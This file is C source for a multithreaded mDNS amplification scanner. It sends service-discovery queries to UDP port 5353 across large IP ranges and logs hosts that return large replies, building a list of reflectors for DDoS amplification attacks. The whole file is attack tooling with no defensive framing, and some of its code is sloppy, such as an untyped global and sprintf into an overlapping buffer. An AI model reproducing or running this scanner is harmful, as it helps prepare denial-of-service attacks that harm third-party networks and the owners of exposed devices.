1
/* MDNS Amplification scanner, made by -Shroom-, credits to whoever made this scanner source because I have no idea. */
2
#include <pthread.h>
3
#include <unistd.h>
4
#include <stdio.h>
5
#include <stdlib.h>
6
#include <string.h>
7
#include <sys/socket.h>
8
#include <netinet/in.h>
9
#include <signal.h>
10
#include <sys/time.h>
11
#include <sys/types.h>
12
#include <math.h>
13
#include <ctype.h>
14
#include <errno.h>
15
#include <arpa/inet.h>
16
#include <netinet/ip.h>
17
#include <netinet/udp.h>
18

19
volatile int running_threads = 0;
20
volatile int found_srvs = 0;
21
volatile unsigned long per_thread = 0;
22
volatile unsigned long start = 0;
23
volatile unsigned long scanned = 0;
24
volatile int sleep_between = 0;
25
volatile int bytes_sent = 0;
26
volatile unsigned long hosts_done = 0;
27
FILE *fd;
28
char payload[] =
29
"\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x09\x5F\x73\x65\x72\x76\x69\x63\x65\x73\x07\x5F\x64\x6E\x73\x2D\x73\x64\x04\x5F\x75\x64\x70\x05\x6C\x6F\x63\x61\x6C\x00\x00\x0C\x00\x01";
30

31
size = sizeof(payload);
32

33
void *flood(void *par1)
34
{
35
    running_threads++;
36
    int thread_id = (int)par1;
37
    unsigned long start_ip = htonl(ntohl(start)+(per_thread*thread_id));
38
    unsigned long end = htonl(ntohl(start)+(per_thread*(thread_id+1)));
39
    unsigned long w;
40
    int y;
41
    unsigned char buf[65536];
42
    memset(buf, 0x01, 46);
43
    int sizeofpayload = 46;
44
    int sock;
45
    if((sock=socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP))<0) {
46
        perror("cant open socket");
47
        exit(-1);
48
    }
49
    for(w=ntohl(start_ip);w<htonl(end);w++)
50
    {
51
        struct sockaddr_in servaddr;
52
        bzero(&servaddr, sizeof(servaddr));
53
        servaddr.sin_family = AF_INET;
54
        servaddr.sin_addr.s_addr=htonl(w);
55
        servaddr.sin_port=htons(5353);
56
        sendto(sock,payload,size,0, (struct sockaddr *)&servaddr,sizeof(servaddr));
57
        bytes_sent+=size;
58
        scanned++;
59
        hosts_done++;
60
    }
61
    close(sock);
62
    running_threads--;
63
    return;
64
}
65

66
void sighandler(int sig)
67
{
68
    fclose(fd);
69
    printf("\n");
70
    exit(0);
71
}
72

73
void *recievethread()
74
{
75
    printf("\n");
76
    int saddr_size, data_size, sock_raw;
77
    struct sockaddr_in saddr;
78
    struct in_addr in;
79

80
    unsigned char *buffer = (unsigned char *)malloc(65536);
81
    sock_raw = socket(AF_INET , SOCK_RAW , IPPROTO_UDP);
82
    if(sock_raw < 0)
83
    {
84
        printf("Socket Error\n");
85
        exit(1);
86
    }
87
    while(1)
88
    {
89
        saddr_size = sizeof saddr;
90
        data_size = recvfrom(sock_raw , buffer , 65536 , 0 , (struct sockaddr *)&saddr , &saddr_size);
91
        if(data_size <0 )
92
        {
93
            printf("Recvfrom error , failed to get packets\n");
94
            exit(1);
95
        }
96
        struct iphdr *iph = (struct iphdr*)buffer;
97
        if(iph->protocol == 17)
98
        {
99
            unsigned short iphdrlen = iph->ihl*4;
100
            struct udphdr *udph = (struct udphdr*)(buffer + iphdrlen);
101
            unsigned char* payload = buffer + iphdrlen + 46;
102
            if(ntohs(udph->source) == 5353)
103
            {
104
                int body_length = data_size - iphdrlen - 46;
105

106
                if (body_length > 40)
107

108
                {
109
                found_srvs++;
110

111
                fprintf(fd,"%s %d\n",inet_ntoa(saddr.sin_addr),body_length);
112
                fflush(fd);
113

114
                }
115

116
            }
117
        }
118

119
    }
120
    close(sock_raw);
121

122
}
123

124
int main(int argc, char *argv[ ])
125
{
126

127
    if(argc < 6){
128
		fprintf(stderr, "Invalid parameters!\n");
129
        fprintf(stdout, "Shrooms MDNS Scanner\nUsage: %s <ip range start (192.0.0.0)> <ip range end (198.255.255.255)> <outfile> <threads> <scan delay in ms>\n", argv[0]);
130
        exit(-1);
131
    }
132
    fd = fopen(argv[3], "a");
133
    sleep_between = atoi(argv[5]);
134

135
    signal(SIGINT, &sighandler);
136

137
    int threads = atoi(argv[4]);
138
    pthread_t thread;
139

140
    pthread_t listenthread;
141
    pthread_create( &listenthread, NULL, &recievethread, NULL);
142

143
    char *str_start = malloc(18);
144
    memset(str_start, 0, 18);
145
    str_start = argv[1];
146
    char *str_end = malloc(18);
147
    memset(str_end, 0, 18);
148
    str_end = argv[2];
149
    start = inet_addr(str_start);
150
    per_thread = (ntohl(inet_addr(str_end)) - ntohl(inet_addr(str_start))) / threads;
151
    unsigned long toscan = (ntohl(inet_addr(str_end)) - ntohl(inet_addr(str_start)));
152
    int i;
153
    for(i = 0;i<threads;i++){
154
        pthread_create( &thread, NULL, &flood, (void *) i);
155
    }
156
    sleep(1);
157
    printf("Scan in Progress \n");
158
    char *temp = (char *)malloc(17);
159
    memset(temp, 0, 17);
160
    sprintf(temp, "MDNS Found");
161
    printf("%-16s", temp);
162
    memset(temp, 0, 17);
163
    sprintf(temp, "IP/s");
164
    printf("%-16s", temp);
165
    memset(temp, 0, 17);
166
    sprintf(temp, "Bytes/s");
167
    printf("%-16s", temp);
168
    memset(temp, 0, 17);
169
    sprintf(temp, "Threads");
170
    printf("%-16s", temp);
171
    memset(temp, 0, 17);
172
    sprintf(temp, "Percent Done");
173
    printf("%s", temp);
174
    printf("\n");
175

176
    char *new;
177
    new = (char *)malloc(16*6);
178
    while (running_threads > 0)
179
    {
180
        printf("\r");
181
        memset(new, '\0', 16*6);
182
        sprintf(new, "%s|%-15lu", new, found_srvs);
183
        sprintf(new, "%s|%-15d", new, scanned);
184
        sprintf(new, "%s|%-15d", new, bytes_sent);
185
        sprintf(new, "%s|%-15d", new, running_threads);
186
        memset(temp, 0, 17);
187
        int percent_done=((double)(hosts_done)/(double)(toscan))*100;
188
        sprintf(temp, "%d%%", percent_done);
189
        sprintf(new, "%s|%s", new, temp);
190
        printf("%s", new);
191
        fflush(stdout);
192
        bytes_sent=0;
193
        scanned = 0;
194
        sleep(1);
195
    }
196
    printf("\n");
197
    fclose(fd);
198
    return 0;
199
}
200